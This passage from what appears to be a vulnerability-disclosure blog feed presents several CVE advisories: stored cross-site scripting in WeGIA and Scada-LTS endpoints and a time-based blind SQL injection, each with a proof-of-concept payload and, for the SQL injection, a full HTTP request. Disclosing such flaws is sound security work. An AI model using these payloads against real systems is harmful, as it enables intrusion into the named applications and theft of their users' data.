target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 24 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-57762/ https://www.cvehunters.com/p/cve-2025-57762/ <h2 id="cve-2025-57762-cross-site-scripting-xss-stored-endpoint-dependente_docdependentephp-parameter-name">CVE-2025-57762: Cross-Site Scripting (XSS) Stored endpoint <code>dependente_docdependente.php</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-57762" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-57762</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>dependente_docdependente.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>dependente_docdependente.php</code></p><h2 id="cve-2025-57762-cross-site-scripting-xss-stored-endpoint-dependente_docdependentephp-parameter-name">CVE-2025-57762: Cross-Site Scripting (XSS) Stored endpoint <code>dependente_docdependente.php</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-57762" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-57762</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>dependente_docdependente.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>dependente_docdependente.php</code></p> <p>Parameter: <code>name</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>name</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-57762/image.png" width="1273" height="849" srcset="/p/cve-2025-57762/image_hu_79c930746da3382f.png 480w, /p/cve-2025-57762/image_hu_dca868afd0ec9e1d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="149" data-flex-basis="359px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-494r-43f3-p828" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-494r-43f3-p828</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 21 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9233/ https://www.cvehunters.com/p/cve-2025-9233/ <h2 id="cve-2025-9233-cross-site-scripting-xss-stored-endpoint-view_editshtm-parameter-name">CVE-2025-9233: Cross-Site Scripting (XSS) Stored endpoint <code>view_edit.shtm</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9233" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9233</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>view_edit.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>view_edit.shtm</code></p><h2 id="cve-2025-9233-cross-site-scripting-xss-stored-endpoint-view_editshtm-parameter-name">CVE-2025-9233: Cross-Site Scripting (XSS) Stored endpoint <code>view_edit.shtm</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9233" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9233</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>view_edit.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>view_edit.shtm</code></p> <p>Parameter: <code>name</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>name</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert("View1")</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9233/image.png" width="917" height="424" srcset="/p/cve-2025-9233/image_hu_5fdba5b40e1e1605.png 480w, /p/cve-2025-9233/image_hu_77b76c01a046725a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="519px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9233.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9233.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 20 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9234/ https://www.cvehunters.com/p/cve-2025-9234/ <h2 id="cve-2025-9234-cross-site-scripting-xss-stored-endpoint-maintenance_eventsshtm-parameter-alias">CVE-2025-9234: Cross-Site Scripting (XSS) Stored endpoint <code>maintenance_events.shtm</code> parameter <code>alias</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9234" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9234</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>maintenance_events.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>alias</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>maintenance_events.shtm</code></p><h2 id="cve-2025-9234-cross-site-scripting-xss-stored-endpoint-maintenance_eventsshtm-parameter-alias">CVE-2025-9234: Cross-Site Scripting (XSS) Stored endpoint <code>maintenance_events.shtm</code> parameter <code>alias</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9234" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9234</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>maintenance_events.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>alias</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>maintenance_events.shtm</code></p> <p>Parameter: <code>alias</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>alias</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert("Maintenance")</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9234/image.png" width="865" height="422" srcset="/p/cve-2025-9234/image_hu_2229e4ca9efcb897.png 480w, /p/cve-2025-9234/image_hu_92833fb3a512e8e0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="204" data-flex-basis="491px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9234.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9234.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 20 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9235/ https://www.cvehunters.com/p/cve-2025-9235/ <h2 id="cve-2025-9235-cross-site-scripting-xss-stored-endpoint-compound_eventsshtm-parameter-name">CVE-2025-9235: Cross-Site Scripting (XSS) Stored endpoint <code>compound_events.shtm</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9235" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9235</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>compound_events.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>compound_events.shtm</code></p><h2 id="cve-2025-9235-cross-site-scripting-xss-stored-endpoint-compound_eventsshtm-parameter-name">CVE-2025-9235: Cross-Site Scripting (XSS) Stored endpoint <code>compound_events.shtm</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9235" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9235</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>compound_events.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>compound_events.shtm</code></p> <p>Parameter: <code>name</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>name</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('Compound-PoC-XSS')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9235/image.png" width="823" height="475" srcset="/p/cve-2025-9235/image_hu_5f30348700829446.png 480w, /p/cve-2025-9235/image_hu_ef6aa04245283b7a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="173" data-flex-basis="415px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9235.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9235.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 20 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9236/ https://www.cvehunters.com/p/cve-2025-9236/ <h2 id="cve-2025-9236-sql-injection-blind-time-based-vulnerability-in-nm_tipo-parameter-on-educar_tipo_usuario_lstphp-endpoint">CVE-2025-9236: SQL Injection (Blind Time-Based) Vulnerability in <code>nm_tipo</code> Parameter on <code>educar_tipo_usuario_lst.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9236" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9236</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>nm_tipo</code> parameter of the <code>educar_tipo_usuario_lst.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>nm_tipo</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-9236-sql-injection-blind-time-based-vulnerability-in-nm_tipo-parameter-on-educar_tipo_usuario_lstphp-endpoint">CVE-2025-9236: SQL Injection (Blind Time-Based) Vulnerability in <code>nm_tipo</code> Parameter on <code>educar_tipo_usuario_lst.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9236" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9236</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>nm_tipo</code> parameter of the <code>educar_tipo_usuario_lst.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>nm_tipo</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>educar_tipo_usuario_lst.php</code></p> <p>Parameter: <code>nm_tipo</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">' AND 8767=(SELECT 8767 FROM PG_SLEEP(10)) OR 'EgwO'='pMdZ </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="n">GET</span> <span class="o">/</span><span class="n">intranet</span><span class="o">/</span><span class="n">educar_tipo_usuario_lst</span><span class="o">.</span><span class="n">php</span><span class="err">?</span><span class="n">busca</span><span class="o">=</span><span class="n">S</span><span class="o">&</span><span class="n">nm_tipo</span><span class="o">=</span><span class="mi">1</span><span class="s1">'%20AND</span><span class="si">%208767%</span><span class="s1">3D(SELECT</span><span class="si">%208767%</span><span class="s1">20FROM%20PG_SLEEP(10))%20OR%20'</span><span class="n">EgwO</span><span class="s1">'%3D'</span><span class="n">pMdZ</span><span class="o">&</span><span class="n">descricao</span><span class="o">=</span><span class="mi">1</span><span class="o">&</span><span class="n">nivel</span><span class="o">=</span><span class="mi">1</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="p">:</span> <span class="n">localhost</span> </span></span><span class="line"><span class="cl"><span class="n">User</span><span class="o">-</span><span class="n">Agent</span><span class="p">:</span> <span class="n">Mozilla</span><span class="o">/</span><span class="mf">5.0</span> <span class="p">(</span><span class="n">X11</span><span class="p">;</span> <span class="n">Linux</span> <span class="n">x86_64</span><span class="p">;</span> <span class="n">rv</span><span class="p">:</span><span class="mf">128.0</span><span class="p">)</span> <span class="n">Gecko</span><span class="o">/</span><span class="mi">20100101</span> <span class="n">Firefox</span><span class="o">/</span><span class="mf">128.0</span> </span></span><span class="line"><span class="cl"><span class="n">Accept</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">html</span><span class="p">,</span><span class="n">application</span><span class="o">/</span><span class="n">xhtml</span><span class="o">+</span><span class="n">xml</span><span class="p">,</span><span class="n">application</span><span class="o">/</span><span class="n">xml</span><span class="p">;</span><span class="n">q</span><span class="o">=</span><span class="mf">0.9</span><span class="p">,</span><span class="o">*/*</span><span class="p">;</span><span class="n">q</span><span class="o">=</span><span class="mf">0.8</span> </span></span><span class="line"><span class="cl"><span class="n">Accept</span><span class="o">-</span><span class="n">Language</span><span class="p">:</span> <span class="n">en</span><span class="o">-</span><span class="n">US</span><span class="p">,</span><span class="n">en</span><span class="p">;</span><span class="n">q</span><span class="o">=</span><span class="mf">0.5</span> </span></span><span class="line"><span class="cl"><span class="n">Accept</span><span class="o">-</span><span class="n">Encoding</span><span class="p">:</span> <span class="n">gzip</span><span class="p">,</span> <span class="n">deflate</span><span class="p">,</span> <span class="n">br</span><span class="p">,</span> <span class="n">zstd</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="p">:</span> <span class="n">keep</span><span class="o">-</span><span class="n">alive</span> </span></span><span class="line"><span class="cl"><span class="n">Referer</span><span class="p">:</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">localhost</span><span class="o">/</span><span class="n">intranet</span><span class="o">/</span><span class="n">educar_tipo_usuario_lst</span><span class="o">.</span><span class="n">php</span><span class="err">?</span><span class="n">busca</span><span class="o">=</span><span class="n">S</span><span class="o">&</span><span class="n">nm_tipo</span><span class="o">=%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="n">E</span><span class="o">%</span><span class="mi">3</span><span class="n">Csvg</span><span class="o">+</span><span class="n">onload</span><span class="o">%</span><span class="mi">3</span><span class="n">Dalert</span><span class="o">%</span><span class="mi">2812</span><span class="o">%</span><span class="mi">29</span><span class="o">%</span><span class="mi">3</span><span class="n">E</span><span class="o">&</span><span class="n">descricao</span><span class="o">=%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="n">E</span><span class="o">%</span><span class="mi">3</span><span class="n">Csvg</span><span class="o">+</span><span class="n">onload</span><span class="o">%</span><span class="mi">3</span><span class="n">Dalert</span><span class="o">%</span><span class="mi">2812</span><span class="o">%</span><span class="mi">29</span><span class="o">%</span><span class="mi">3</span><span class="n">E</span><span class="o">&</span><span class="n">nivel</span><span class="o">=-</span><span class="mi">1</span> </span></span><span class="line"><span class="cl"><span class="n">Cookie</span><span class="p">:</span> <span class="n">grav</span><span class="o">-</span><span class="n">admin</span><span class="o">-</span><span class="n">flexpages</span><span class="o">=</span><span class="n">eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319</span><span class="p">;</span> <span class="n">grav</span><span class="o">-</span><span class="n">tabs</span><span class="o">-</span><span class="n">state</span><span class="o">=</span><span class="p">{</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">--</span><span class="n">f0e041eed24f87f2b6b02fd6924d0a08</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">languages</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">e838602f51515c83bca06a8ae758ce52</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">security</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">b6676b27f5cdf6b6c22f8e18da4259a0</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">advanced</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">raw</span><span class="o">-</span><span class="mi">8</span><span class="n">f0a83a672754f7823714134334b1de8</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">content</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">dc26c564cb2116d77bda5fff24ba90dc</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">security</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex_conf</span><span class="o">-</span><span class="n">user_groups</span><span class="o">-</span><span class="n">accounts</span><span class="o">-</span><span class="mi">02</span><span class="n">f0e9f68f41a0648ed530f80bd72c06</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">cache</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">raw</span><span class="o">-</span><span class="mi">9</span><span class="n">a0364b9e99bb480dd25e1f0284c8555</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">content</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">-</span><span class="n">flex</span><span class="o">-</span><span class="n">pages</span><span class="o">-</span><span class="n">e91e6348157868de9dd8b25c81aebfb9</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">security</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">--</span><span class="mi">8</span><span 